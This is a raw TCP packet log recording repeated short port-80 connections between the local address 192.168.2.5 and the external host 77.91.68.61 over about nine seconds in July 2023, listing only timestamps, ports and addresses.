Jul 27, 2023 01:36:12.304229975 CEST	50458	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:12.348449945 CEST	80	50458	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:12.352220058 CEST	80	50458	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:12.352477074 CEST	50458	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:12.462104082 CEST	50458	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:12.462821007 CEST	50459	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:12.506520033 CEST	80	50458	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:12.506761074 CEST	50458	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:12.506975889 CEST	80	50459	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:12.507126093 CEST	50459	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:12.507503033 CEST	50459	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:12.551274061 CEST	80	50459	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:12.554950953 CEST	80	50459	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:12.555092096 CEST	50459	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:12.712857962 CEST	50459	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:12.713540077 CEST	50460	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:12.756829023 CEST	80	50459	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:12.756997108 CEST	50459	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:12.757944107 CEST	80	50460	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:12.758052111 CEST	50460	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:12.758398056 CEST	50460	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:12.803005934 CEST	80	50460	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:12.806917906 CEST	80	50460	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:12.807044029 CEST	50460	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:12.914638996 CEST	50460	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:12.915375948 CEST	50461	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:12.959230900 CEST	80	50460	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:12.959397078 CEST	50460	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:12.959685087 CEST	80	50461	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:12.959819078 CEST	50461	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:12.965200901 CEST	50461	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:13.010044098 CEST	80	50461	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:13.014790058 CEST	80	50461	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:13.014913082 CEST	50461	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:13.133965015 CEST	50461	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:13.135217905 CEST	50462	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:13.178885937 CEST	80	50461	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:13.179060936 CEST	50461	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:13.179759026 CEST	80	50462	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:13.179879904 CEST	50462	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:13.182593107 CEST	50462	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:13.228820086 CEST	80	50462	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:13.233550072 CEST	80	50462	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:13.233752012 CEST	50462	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:13.339360952 CEST	50462	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:13.349555969 CEST	50463	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:13.383884907 CEST	80	50462	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:13.384002924 CEST	50462	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:13.394090891 CEST	80	50463	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:13.394272089 CEST	50463	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:13.394745111 CEST	50463	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:13.439203978 CEST	80	50463	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:13.443434954 CEST	80	50463	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:13.443631887 CEST	50463	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:13.558722019 CEST	50463	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:13.559606075 CEST	50464	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:13.603192091 CEST	80	50463	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:13.603293896 CEST	50463	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:13.603519917 CEST	80	50464	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:13.603616953 CEST	50464	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:13.604136944 CEST	50464	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:13.648190022 CEST	80	50464	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:13.652570009 CEST	80	50464	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:13.652647972 CEST	50464	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:13.762609005 CEST	50464	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:13.763030052 CEST	50465	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:13.806843042 CEST	80	50464	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:13.806953907 CEST	50464	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:13.807383060 CEST	80	50465	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:13.807545900 CEST	50465	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:13.807885885 CEST	50465	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:13.852303982 CEST	80	50465	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:13.856422901 CEST	80	50465	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:13.856555939 CEST	50465	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:13.961246967 CEST	50465	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:13.961894035 CEST	50466	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:14.005976915 CEST	80	50465	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:14.006114960 CEST	50465	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:14.006663084 CEST	80	50466	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:14.006783009 CEST	50466	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:14.008773088 CEST	50466	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:14.053853989 CEST	80	50466	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:14.057481050 CEST	80	50466	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:14.057651997 CEST	50466	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:14.181639910 CEST	50466	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:14.182600975 CEST	50467	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:14.230156898 CEST	80	50466	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:14.230323076 CEST	50466	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:14.230791092 CEST	80	50467	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:14.230906963 CEST	50467	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:14.231384993 CEST	50467	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:14.275614023 CEST	80	50467	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:14.278984070 CEST	80	50467	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:14.279083967 CEST	50467	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:14.383279085 CEST	50467	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:14.384169102 CEST	50468	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:14.427778006 CEST	80	50467	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:14.427928925 CEST	50467	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:14.428801060 CEST	80	50468	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:14.428936958 CEST	50468	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:14.448090076 CEST	50468	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:14.492939949 CEST	80	50468	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:14.497167110 CEST	80	50468	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:14.497307062 CEST	50468	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:14.603066921 CEST	50468	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:14.613235950 CEST	50469	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:14.647576094 CEST	80	50468	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:14.647687912 CEST	50468	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:14.658087015 CEST	80	50469	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:14.658221006 CEST	50469	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:14.660676956 CEST	50469	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:14.705755949 CEST	80	50469	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:14.709516048 CEST	80	50469	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:14.709636927 CEST	50469	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:14.820945024 CEST	50469	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:14.821897984 CEST	50470	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:14.866517067 CEST	80	50470	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:14.866595030 CEST	80	50469	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:14.866703033 CEST	50470	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:14.866764069 CEST	50469	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:14.867324114 CEST	50470	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:14.911945105 CEST	80	50470	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:14.916129112 CEST	80	50470	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:14.916851044 CEST	50470	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:15.026427984 CEST	50470	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:15.027143955 CEST	50471	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:15.070938110 CEST	80	50470	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:15.071523905 CEST	80	50471	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:15.071523905 CEST	50470	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:15.071628094 CEST	50471	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:15.080708027 CEST	50471	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:15.125343084 CEST	80	50471	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:15.129879951 CEST	80	50471	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:15.129993916 CEST	50471	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:15.242959023 CEST	50471	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:15.243902922 CEST	50472	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:15.287646055 CEST	80	50471	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:15.287775993 CEST	50471	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:15.288433075 CEST	80	50472	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:15.288562059 CEST	50472	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:15.289351940 CEST	50472	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:15.333385944 CEST	80	50472	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:15.337184906 CEST	80	50472	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:15.337301016 CEST	50472	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:15.446149111 CEST	50472	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:15.446820021 CEST	50473	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:15.490482092 CEST	80	50472	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:15.490583897 CEST	50472	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:15.490886927 CEST	80	50473	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:15.491350889 CEST	50473	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:15.491673946 CEST	50473	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:15.535617113 CEST	80	50473	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:15.539551020 CEST	80	50473	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:15.539659977 CEST	50473	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:15.648776054 CEST	50473	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:15.649817944 CEST	50474	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:15.692951918 CEST	80	50473	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:15.693051100 CEST	50473	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:15.694284916 CEST	80	50474	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:15.696166992 CEST	50474	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:15.697019100 CEST	50474	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:15.741781950 CEST	80	50474	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:15.745979071 CEST	80	50474	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:15.748064995 CEST	50474	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:15.851773977 CEST	50474	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:15.852405071 CEST	50475	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:15.896390915 CEST	80	50474	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:15.896446943 CEST	80	50475	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:15.896502972 CEST	50474	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:15.896574974 CEST	50475	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:15.897147894 CEST	50475	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:15.941070080 CEST	80	50475	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:15.945004940 CEST	80	50475	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:15.945106983 CEST	50475	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:16.061263084 CEST	50475	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:16.062295914 CEST	50476	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:16.105521917 CEST	80	50475	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:16.106671095 CEST	80	50476	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:16.106880903 CEST	50475	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:16.106939077 CEST	50476	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:16.107287884 CEST	50476	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:16.151716948 CEST	80	50476	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:16.157027006 CEST	80	50476	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:16.157452106 CEST	50476	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:16.273854971 CEST	50476	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:16.274513960 CEST	50477	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:16.318567038 CEST	80	50476	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:16.318785906 CEST	50476	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:16.319247007 CEST	80	50477	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:16.319447994 CEST	50477	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:16.321224928 CEST	50477	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:16.366085052 CEST	80	50477	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:16.370201111 CEST	80	50477	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:16.370381117 CEST	50477	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:16.477093935 CEST	50477	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:16.497936964 CEST	50478	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:16.522125959 CEST	80	50477	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:16.522593975 CEST	50477	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:16.542285919 CEST	80	50478	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:16.545114040 CEST	50478	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:16.545707941 CEST	50478	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:16.589570999 CEST	80	50478	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:16.593344927 CEST	80	50478	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:16.593699932 CEST	50478	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:16.695746899 CEST	50478	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:16.696487904 CEST	50479	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:16.740082979 CEST	80	50478	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:16.740782976 CEST	80	50479	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:16.740890980 CEST	50478	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:16.740928888 CEST	50479	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:16.741348028 CEST	50479	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:16.785578012 CEST	80	50479	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:16.790319920 CEST	80	50479	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:16.792870045 CEST	50479	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:16.899485111 CEST	50479	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:16.901369095 CEST	50480	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:16.944056034 CEST	80	50479	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:16.944210052 CEST	50479	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:16.945408106 CEST	80	50480	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:16.945554018 CEST	50480	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:17.011612892 CEST	50480	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:17.056010962 CEST	80	50480	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:17.061142921 CEST	80	50480	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:17.061311960 CEST	50480	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:17.344240904 CEST	50480	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:17.344937086 CEST	50481	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:17.388526917 CEST	80	50480	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:17.388643980 CEST	50480	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:17.389622927 CEST	80	50481	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:17.389750957 CEST	50481	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:17.392575979 CEST	50481	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:17.437185049 CEST	80	50481	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:17.442708969 CEST	80	50481	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:17.442791939 CEST	50481	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:17.585474014 CEST	50481	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:17.586301088 CEST	50482	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:17.630211115 CEST	80	50481	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:17.630245924 CEST	80	50482	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:17.630306959 CEST	50481	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:17.630384922 CEST	50482	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:17.631989956 CEST	50482	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:17.676031113 CEST	80	50482	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:17.679928064 CEST	80	50482	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:17.680048943 CEST	50482	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:17.879162073 CEST	50482	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:17.879905939 CEST	50483	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:17.923322916 CEST	80	50482	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:17.923475981 CEST	50482	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:17.924336910 CEST	80	50483	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:17.924487114 CEST	50483	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:18.350517988 CEST	50483	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:18.395020962 CEST	80	50483	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:18.400531054 CEST	80	50483	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:18.400652885 CEST	50483	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:18.567575932 CEST	50483	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:18.568787098 CEST	50484	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:18.616708994 CEST	80	50484	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:18.616874933 CEST	50484	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:18.617806911 CEST	80	50483	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:18.617923975 CEST	50483	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:18.626300097 CEST	50484	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:18.670784950 CEST	80	50484	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:18.674458981 CEST	80	50484	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:18.674551010 CEST	50484	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:18.792969942 CEST	50484	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:18.793899059 CEST	50485	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:18.837572098 CEST	80	50484	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:18.837691069 CEST	50484	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:18.837913990 CEST	80	50485	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:18.838009119 CEST	50485	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:18.845316887 CEST	50485	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:18.889405966 CEST	80	50485	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:18.893070936 CEST	80	50485	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:18.893244982 CEST	50485	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:19.718425989 CEST	50485	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:19.718972921 CEST	50486	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:19.762666941 CEST	80	50485	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:19.762780905 CEST	50485	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:19.763340950 CEST	80	50486	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:19.763462067 CEST	50486	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:19.768069029 CEST	50486	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:19.812556028 CEST	80	50486	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:19.816915035 CEST	80	50486	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:19.817060947 CEST	50486	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:20.092711926 CEST	50487	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:20.092715979 CEST	50486	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:20.137794018 CEST	80	50486	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:20.137907028 CEST	50486	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:20.138160944 CEST	80	50487	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:20.138242960 CEST	50487	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:20.148091078 CEST	50487	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:20.192878008 CEST	80	50487	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:20.197367907 CEST	80	50487	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:20.197544098 CEST	50487	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:20.340075016 CEST	50487	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:20.340742111 CEST	50488	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:20.384885073 CEST	80	50487	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:20.384980917 CEST	50487	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:20.385370016 CEST	80	50488	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:20.385448933 CEST	50488	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:20.391696930 CEST	50488	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:20.436608076 CEST	80	50488	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:20.441114902 CEST	80	50488	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:20.441200972 CEST	50488	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:20.558128119 CEST	50488	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:20.558917999 CEST	50489	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:20.602921009 CEST	80	50489	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:20.603035927 CEST	50489	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:20.603050947 CEST	80	50488	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:20.603113890 CEST	50488	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:20.604461908 CEST	50489	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:20.648456097 CEST	80	50489	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:20.652375937 CEST	80	50489	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:20.652482033 CEST	50489	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:20.763868093 CEST	50489	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:20.764595985 CEST	50490	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:20.808012009 CEST	80	50489	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:20.808114052 CEST	50489	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:20.808810949 CEST	80	50490	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:20.808892965 CEST	50490	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:20.810292959 CEST	50490	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:20.854481936 CEST	80	50490	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:20.858649969 CEST	80	50490	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:20.859004021 CEST	50490	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:20.977945089 CEST	50490	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:20.978641033 CEST	50491	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:21.022293091 CEST	80	50490	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:21.022399902 CEST	50490	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:21.022926092 CEST	80	50491	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:21.023040056 CEST	50491	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:21.025799990 CEST	50491	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:36:21.070132971 CEST	80	50491	77.91.68.61	192.168.2.5
Jul 27, 2023 01:36:21.074829102 CEST	80	50491	77.91.68.61	192.168.2.5
